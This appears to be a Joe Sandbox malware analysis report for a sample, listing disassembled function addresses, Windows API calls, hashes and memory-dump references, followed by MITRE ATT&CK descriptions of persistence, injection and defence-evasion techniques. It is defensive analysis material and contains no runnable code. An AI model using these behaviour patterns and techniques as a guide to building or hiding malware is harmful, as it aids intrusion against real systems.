Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: memcpy$FileWrite
String ID:
API String ID: 3457131274-0
Opcode ID: 430fcabc74146748b10a5d1aa58081535d49e1319aacba17e3c89140f60aa00d
Instruction ID: b713b32a0073a46aa718fb7c2f3049b9c34ab46680d856e50a716b5dcd1ad319
Opcode Fuzzy Hash: 430fcabc74146748b10a5d1aa58081535d49e1319aacba17e3c89140f60aa00d
Instruction Fuzzy Hash: A621B6F1A00655BBD220DA25D984F97BB5CFF14394B54012BE80987A01D73CF8AAC7E9

Function 0080B0D4 Relevance: 7.6, APIs: 5, Instructions: 75memoryfileCOMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(00000000,?), ref: 0080B11C
LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0080B13F
ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0080B160
LocalFree.KERNEL32(EC8350EC), ref: 0080B17F
CloseHandle.KERNEL32(00000000), ref: 0080B186

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: FileLocal$AllocCloseFreeHandleReadSize
String ID:
API String ID: 2363778996-0
Opcode ID: 385fe86b5d78b41b0f96b2b6be6f24aad4e2f19d7f5df57c5e3cd0131f8f0b94
Instruction ID: 97f2a997efb359e4deaa536a2ee6ddca4f871bf61ea1f93ea920432733fb1f12
Opcode Fuzzy Hash: 385fe86b5d78b41b0f96b2b6be6f24aad4e2f19d7f5df57c5e3cd0131f8f0b94
Instruction Fuzzy Hash: 1221AF35600700AFC710EF69DC85A5ABBFAFF8A310F009919F996C72A1DB70E945CB51

Function 00814793 Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON

Download Yara Rule

APIs

Part of subcall function 00813975: lstrcpy.KERNEL32(00000000,?), ref: 00813999

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0042EEFC,?,?,?,?,?,00644AE0,?,?,00644A23,?,?,?,?), ref: 008147BE
Process32First.KERNEL32(00000000,?), ref: 008147C8
Process32Next.KERNEL32(00000000,?), ref: 008147D8
Process32Next.KERNEL32(00000000,?), ref: 0081483B
CloseHandle.KERNEL32(00000000), ref: 00814846

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcpy
String ID:
API String ID: 2673430994-0
Opcode ID: d9b71223fb4a6d86eb45038ce0ff4f8db6f96fd0667739d18a1f46e8e92de1e8
Instruction ID: 8eaaf31feb8fc409cd48657785f5d4aad092957d191765134e90ca17df851c29
Opcode Fuzzy Hash: d9b71223fb4a6d86eb45038ce0ff4f8db6f96fd0667739d18a1f46e8e92de1e8
Instruction Fuzzy Hash: 4911C4743003A46BE7106B209C8AFBF7E6DFF82B58F042429F545C6682DF798944C762

Function 0081485B Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,?), ref: 0081486A
GetDeviceCaps.GDI32(00000000,00000008), ref: 00814875
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00814880
ReleaseDC.USER32(00000000,00000000), ref: 0081488A
GetProcessHeap.KERNEL32(?,0081751A,?,?,?,00644AC5,?,?,00644A23,?,?,00000000,?,?,00644AB8,?), ref: 00814896

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: CapsDevice$CreateHeapProcessRelease
String ID:
API String ID: 2515617246-0
Opcode ID: 74099194b8ff2a3052478e3cbb286403c3eeeff0735e7d7de334ae1239f9a096
Instruction ID: bfd69ee7fb2ec05733f2b266036297cea57b489ceeba0512c0bb85d752f2d5cd
Opcode Fuzzy Hash: 74099194b8ff2a3052478e3cbb286403c3eeeff0735e7d7de334ae1239f9a096
Instruction Fuzzy Hash: 1F015E79201254BFE3209B61BC4AF573EAFFB63B91F012024FA0583261DEA51C1487A0

Function 00414A80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,0000000A,004150C3,00000000,?,00000000,0000000A,?,0000000A,00000000,?,0040B5D7,?), ref: 00414A86
HeapAlloc.KERNEL32(00000000,00000000,000000FA,?,00000000,0000000A,?,0000000A,00000000,?,0040B5D7,?), ref: 00414A94
wsprintfW.USER32 ref: 00414AA3

Strings

%hs, xrefs: 00414A9D

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: eb602275fec487db5c4cdddd0d08a58ecb9e759a3597a397cdb84320ea1c1b3d
Instruction ID: 5bd6a179048394e7de729c67cb4f3c16f8518d2a372a11019db7bb97310c50b9
Opcode Fuzzy Hash: eb602275fec487db5c4cdddd0d08a58ecb9e759a3597a397cdb84320ea1c1b3d
Instruction Fuzzy Hash: 99D05E727402207FC2306769BC0DF17773CEBD5B22FD40535FA05D2160CAB0580587A8

Function 0081FBEF Relevance: 6.1, APIs: 4, Instructions: 85fileCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000), ref: 0081FC23
memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,008205C9,?,00000001), ref: 0081FC34
memcpy.MSVCRT(?,?,?), ref: 0081FC78
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,008205C9,?,00000001), ref: 0081FC94

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: memcpy$FileWrite
String ID:
API String ID: 3457131274-0
Opcode ID: 9215c21dc182df5fafe0726e750e4efb347a45575b5d7e87538c8df8d44726ae
Instruction ID: 4058662cb56404ebb41785ab32b0d390b99c73a68a1348069d8753eda0bebd56
Opcode Fuzzy Hash: 9215c21dc182df5fafe0726e750e4efb347a45575b5d7e87538c8df8d44726ae
Instruction Fuzzy Hash: 2121B1B1A04629BBD620DB25D984A93B76CFF54354B140125FD09C7A02E731F8A5DBE1

Function 00813E75 Relevance: 6.0, APIs: 4, Instructions: 46registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00813E87

Part of subcall function 00813F25: GetProcessHeap.KERNEL32(?,?,?,?,?,00813E9E), ref: 00813F3A
Part of subcall function 00813F25: RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?,?,?,?,?,?,00813E9E), ref: 00813F61
Part of subcall function 00813F25: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00813E9E), ref: 00813FE4

RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119), ref: 00813EBA
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,000000FF), ref: 00813ED8
RegCloseKey.ADVAPI32 ref: 00813EE1

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: CloseHeapOpenProcess$QueryValue
String ID:
API String ID: 655526730-0
Opcode ID: 87d23d9e2cff60529d3811262601cbe9998ce836c8214680716d8226d927426d
Instruction ID: d34e72030580498ebe7aeedd9d24d4802380fbe541aed07931fa69a03477b6dd
Opcode Fuzzy Hash: 87d23d9e2cff60529d3811262601cbe9998ce836c8214680716d8226d927426d
Instruction Fuzzy Hash: 0201F534904204EFD7109F60FC0FB663BAAFF43B05F042029F6459A0A0DFB14C949791

Function 008016BF Relevance: 6.0, APIs: 4, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 008016DC
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020119), ref: 008016FA
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 00801714
RegCloseKey.ADVAPI32 ref: 0080171D

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: CloseHeapOpenProcessQueryValue
String ID:
API String ID: 3302636555-0
Opcode ID: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
Instruction ID: 345efd19c7c78e6a5f1539cfcdb1ac9cedb23dd5976652a2959dcf2126da34df
Opcode Fuzzy Hash: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
Instruction Fuzzy Hash: 40F03776209258BFD310AB66EC4EE1BBFADFBCAB55F001429F98492150DA319814DBB1

Function 0081425F Relevance: 6.0, APIs: 4, Instructions: 36registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00814272
RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119), ref: 00814299
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,000000FF), ref: 008142B5
RegCloseKey.ADVAPI32 ref: 008142BE

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: CloseHeapOpenProcessQueryValue
String ID:
API String ID: 3302636555-0
Opcode ID: 452cdb83861d160aaeab07dcfee94487d58c1dcd5cff8eef09409231a212c46b
Instruction ID: 230cb43ceab222aa470e843a6ab39f6258fe3eebe754622074739ca4e5fdf17d
Opcode Fuzzy Hash: 452cdb83861d160aaeab07dcfee94487d58c1dcd5cff8eef09409231a212c46b
Instruction Fuzzy Hash: FEF03A35504150BBD7206B66FD0EE5BBFAEFFC6B11F401028F94496160DA714854DBA1

Function 004148F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87stringtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
lstrlenA.KERNEL32(00000000), ref: 004149BE

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 00414951

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpylstrlen
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
API String ID: 3844799746-2529986050
Opcode ID: 750d2aa208a34747d7678eb531c57cdd49b6176f000d565d5a4f2305a08da36e
Instruction ID: c736f10abd315c62769dbfe5a1a641e1cbd682ca060b05bc7c7f52c3ab47b370
Opcode Fuzzy Hash: 750d2aa208a34747d7678eb531c57cdd49b6176f000d565d5a4f2305a08da36e
Instruction Fuzzy Hash: 7E2126747142945BCB18AB36981637B7A93EBC2319F05507EF4C6873D1CE398C51C799

Function 00420E1B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00420E27

Part of subcall function 00420E92: std::exception::exception.LIBCONCRT ref: 00420E9F

Part of subcall function 00420F5E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00420E1A,?,0042FAAC,?), ref: 00420FBE

std::exception::exception.LIBCMT ref: 00420E44

Part of subcall function 00420D34: ___std_exception_copy.LIBVCRUNTIME ref: 00420D52

Strings

mB, xrefs: 00420E49

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: std::exception::exception$ExceptionRaise___std_exception_copystd::invalid_argument::invalid_argument
String ID: mB
API String ID: 2169675119-2452807568
Opcode ID: 762417f7dd4c8e10dfcb5cd59a9516837bbceaeff1db5b106ba1449143d0051d
Instruction ID: e72b37502660f04861b35797f6b59bd50dabb48465353804d4c1080e981a2c3b
Opcode Fuzzy Hash: 762417f7dd4c8e10dfcb5cd59a9516837bbceaeff1db5b106ba1449143d0051d
Instruction Fuzzy Hash: ADE0E67560022C778B14BAD6F845CCABBAC9A10750BC0843ABA4856142D7B9E555C7DC

Function 00412C14 Relevance: 5.1, APIs: 4, Instructions: 142COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,0040A4F7), ref: 00412CDF

Part of subcall function 004125E0: ??2@YAPAXI@Z.MSVCRT(?,00412594,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 004125F8

memmove.MSVCRT(00000000,?,?,?,?,0040A4F7), ref: 00412C79
memmove.MSVCRT(?,?,?,?,?,?,?,0040A4F7), ref: 00412C8A
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,0040A4F7), ref: 00412CA4

Part of subcall function 004122F4: ??3@YAXPAX@Z.MSVCRT(?,004125C6,?,?,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 0041231C

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: memmove$??2@??3@
String ID:
API String ID: 1832667548-0
Opcode ID: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
Instruction ID: 9b3e77e2d5c6555fac4121ee25edb4a6bace10c9852293726eadeddcd5a41003
Opcode Fuzzy Hash: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
Instruction Fuzzy Hash: DD414A727042509FC315DF29DA8486FBBE6AFD9700719896EE4C9C7304EA74AC45CB91

Function 00812E7B Relevance: 5.1, APIs: 4, Instructions: 142COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,0080A75E,00000000,000000FF,00643A04,?,0080AB9C,?,?,00643A38), ref: 00812F46

Part of subcall function 00812847: ??2@YAPAXI@Z.MSVCRT(?,008127FB,008125B7,?,008125B6,?,?,00643EC0,0081272A,?,008125FB,008125B6,00000000,?,?,?), ref: 0081285F

memmove.MSVCRT(00000000,?,?,?,?,0080A75E,00000000,000000FF,00643A04,?,0080AB9C,?,?,00643A38), ref: 00812EE0
memmove.MSVCRT(?,?,?,?,?,?,?,0080A75E,00000000,000000FF,00643A04,?,0080AB9C,?,?,00643A38), ref: 00812EF1
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,0080A75E,00000000,000000FF,00643A04,?,0080AB9C), ref: 00812F0B

Part of subcall function 0081255B: ??3@YAXPAX@Z.MSVCRT(?,0081282D,?,00000010,008125B7,?,008125B6,?,?,00643EC0,0081272A,?,008125FB,008125B6,00000000,?), ref: 00812583

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: memmove$??2@??3@
String ID:
API String ID: 1832667548-0
Opcode ID: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
Instruction ID: ffd1ab38409ed8b7e93aea9d55df36bc69c6f46d2c8b0c045dc71524bebf69f8
Opcode Fuzzy Hash: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
Instruction Fuzzy Hash: CC41E7726042518FC725DF28D9848AABBEAFFD9700B19896CF4C9C7304DE31AC95C7A1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

